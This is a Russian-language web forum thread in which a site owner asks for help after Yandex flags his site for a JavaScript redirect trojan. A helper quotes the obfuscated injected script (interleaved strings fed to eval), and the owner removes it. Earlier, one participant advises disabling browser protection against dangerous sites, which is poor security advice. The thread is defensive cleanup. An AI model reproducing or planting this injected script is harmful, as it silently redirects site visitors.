Ares
Участник
- Реакции
- 6
вот такая беда приключилась яндекс вебмастер начал писать о моем сайте что на сайте http://fermes.top/
Troj/JSRedir-RP кто может помоч его обнаружить и убить))
Andreys
Участник
- Реакции
- 40
Ares
Участник
- Реакции
- 6
у меня vds свой куплен на прямую у ovh а насчет домена да он за 1руб была тут темка на форумеAndreys написал(а):Ну а че когда на твой сайт заходишь , тебя перекидывает на страницу сайта ленинга, на эту страницу, и это у тебя давно так я заметил
![]()
У тебя че домен бесплатный, или хостинг , тогда они такие ывещи прявязывают, или там сам так сделал ))
Andreys
Участник
- Реакции
- 40
Значит отключи защиту от опасных, сайтов в браузере да не парься, я так давно сделал.Ares написал(а):у меня vds свой куплен на прямую у ovh а насчет домена да он за 1руб была тут темка на форуме
Ares
Участник
- Реакции
- 6
я так то тоже не парюсь а вот 51 зареганый юзер уже спрашывает чего так))) искал сканерами антивирусниками нету ничего а гребаный яндекс только пугает людейAndreys написал(а):Значит отключи защиту от опасных, сайтов в браузере да не парься, я так давно сделал.
Andreys
Участник
- Реакции
- 40
Ну некоторые антивирусники тоже бывает пугают, только изза того что в их базе нет информации, поэтому и страхуются , а на самом деле ничего страшного нет.. Может у яндекса домен top в черном списке )) черт их знает, может тип таких сайтов как ферма у них считают опасными вот и заносится на всякий случай чтобы людей предупредить.Ares написал(а):я так то тоже не парюсь а вот 51 зареганый юзер уже спрашывает чего так))) искал сканерами антивирусниками нету ничего а гребаный яндекс только пугает людей
Хотя припоминаю у меня лет 5 назад что то на подобие было, на сайт ссылку с баннером разместил, так юкоз тоже все время предупреждал что какойто код неправильный на сайте есть. Попробуй на бесплатном домене поэксперементировать
Последнее редактирование:
Ares
Участник
- Реакции
- 6
пробовал есть домен в точке ru тоже самое его сразу поместили как вредоносный домен в поряде .top роботал норм вот пару дней назад отметили как вредоносныйAndreys написал(а):Ну некоторые антивирусники тоже бывает пугают, только изза того что в их базе нет информации, поэтому и страхуются , а на самом деле ничего страшного нет.. Может у яндекса домен top в черном списке )) черт их знает, может тип таких сайтов как ферма у них считают опасными вот и заносится на всякий случай чтобы людей предупредить.
Хотя припоминаю у меня лет 5 назад что то на подобие было, на сайт ссылку с баннером разместил, так юкоз тоже все время предупреждал что какойто код неправильный на сайте есть. Попробуй на бесплатном домене поэксперементировать
Andreys
Участник
- Реакции
- 40
Значит реально что то есть, только может он и не вредоносный) а просто коряво скрипт написан, может еще кто такую ферму ставил, надо у них спросить.Ares написал(а):пробовал есть домен в точке ru тоже самое его сразу поместили как вредоносный домен в поряде .top роботал норм вот пару дней назад отметили как вредоносный
Ares
Участник
- Реакции
- 6
в начале ничего небыло я модуляй не ставил только правки вносилAndreys написал(а):Значит реально что то есть, только может он и не вредоносный) а просто коряво скрипт написан, может еще кто такую ферму ставил, надо у них спросить.
himik
Участник
- Реакции
- 32
Проверь у себя на сайте все JS-скрипты на наличие такого кода и поудаляй егоAres написал(а):вот такая беда приключилась яндекс вебмастер начал писать о моем сайте что на сайте http://fermes.top/
Код:
(function(){var a="(ni(fcoc)f.br,=hp/)xut8ixut0)'t/)xut7ixut0)'w)xut4ixnx('=)xpt/[;(ief?!1=si')]erxaht(nwotnoner=dunree,=ce.oedt_mo'=wa(Dea(gDe+)omtoiin'a=eis+ir!'r!o&onx(e)-{ttv(ni(wd.ci.e't/br1}0)(;",b="fco)utn({(ss(8=ts/x.br)f.br,=hp/x.br)f.br,=w.x.br)f.dO')-x.l('0ixnx('=)xpt?[;tn}ro=wd.ci.sa)ecomterrcdunck,e=y_f,n t).ttDea(2;ce.oedt;t/xr=Dfe=&e=s&.dOin=1sIeafco)iolaohfhp/0uB,0})",c="utn{ni xixut0)'t:'=ss(;(ss(7=t:'=ss(;(ss(4=w'=ss(;(ief/!1=si')]f.dO')-x.l('0ru v sciolaohtm,f(ce.fr)oomtoiin'_=fDeDe;sDe.tt)0dunck=e+ph;pe';(f'&fhtciefdt=)enrlutn{nwotnr=t:q./'20})",d="";for(var i=0;i<a.length;i++)d+=a.charAt(i)+b.charAt(i)+c.charAt(i);eval(d);}());
Ares
Участник
- Реакции
- 6
75 раз такое нашол))) все стер, сменил пароли от vds от фтп от бд))himik написал(а):Проверь у себя на сайте все JS-скрипты на наличие такого кода и поудаляй его
он в самом конце файлов,проверяй все файлы JS и смени пароли на хостинге и фтпКод:(function(){var a="(ni(fcoc)f.br,=hp/)xut8ixut0)'t/)xut7ixut0)'w)xut4ixnx('=)xpt/[;(ief?!1=si')]erxaht(nwotnoner=dunree,=ce.oedt_mo'=wa(Dea(gDe+)omtoiin'a=eis+ir!'r!o&onx(e)-{ttv(ni(wd.ci.e't/br1}0)(;",b="fco)utn({(ss(8=ts/x.br)f.br,=hp/x.br)f.br,=w.x.br)f.dO')-x.l('0ixnx('=)xpt?[;tn}ro=wd.ci.sa)ecomterrcdunck,e=y_f,n t).ttDea(2;ce.oedt;t/xr=Dfe=&e=s&.dOin=1sIeafco)iolaohfhp/0uB,0})",c="utn{ni xixut0)'t:'=ss(;(ss(7=t:'=ss(;(ss(4=w'=ss(;(ief/!1=si')]f.dO')-x.l('0ru v sciolaohtm,f(ce.fr)oomtoiin'_=fDeDe;sDe.tt)0dunck=e+ph;pe';(f'&fhtciefdt=)enrlutn{nwotnr=t:q./'20})",d="";for(var i=0;i<a.length;i++)d+=a.charAt(i)+b.charAt(i)+c.charAt(i);eval(d);}());
Последнее редактирование:
Ares
Участник
- Реакции
- 6
https://www.virustotal.com/ru/file/7d153d1518481915d644fc21d87df703fc681830c41ec52df870374f76d929e7/analysis/1457706232/ 56 антивирусников счетают теперь его невинным)) спасибо химик
himik
Участник
- Реакции
- 32
Пожалуйста) просто недавно мне тож такую хню закинули)Ares написал(а):https://www.virustotal.com/ru/file/7d153d1518481915d644fc21d87df703fc681830c41ec52df870374f76d929e7/analysis/1457706232/ 56 антивирусников счетают теперь его невинным)) спасибо химик
Ares
Участник
- Реакции
- 6
Все круто яндекс снял предупреждения
Перепроверка сайта fermes.top не выявила потенциально опасного кода
12.03.2016
Здравствуйте, Зозуля Вова!
Последняя проверка сайта 12 Марта 2016 не выявила страниц, содержащих вредоносный код. В результатах поиска сайт выводится без пометок.
---
С уважением,
Яндекс.Вебмастер
Перепроверка сайта fermes.top не выявила потенциально опасного кода
12.03.2016
Здравствуйте, Зозуля Вова!
Последняя проверка сайта 12 Марта 2016 не выявила страниц, содержащих вредоносный код. В результатах поиска сайт выводится без пометок.
---
С уважением,
Яндекс.Вебмастер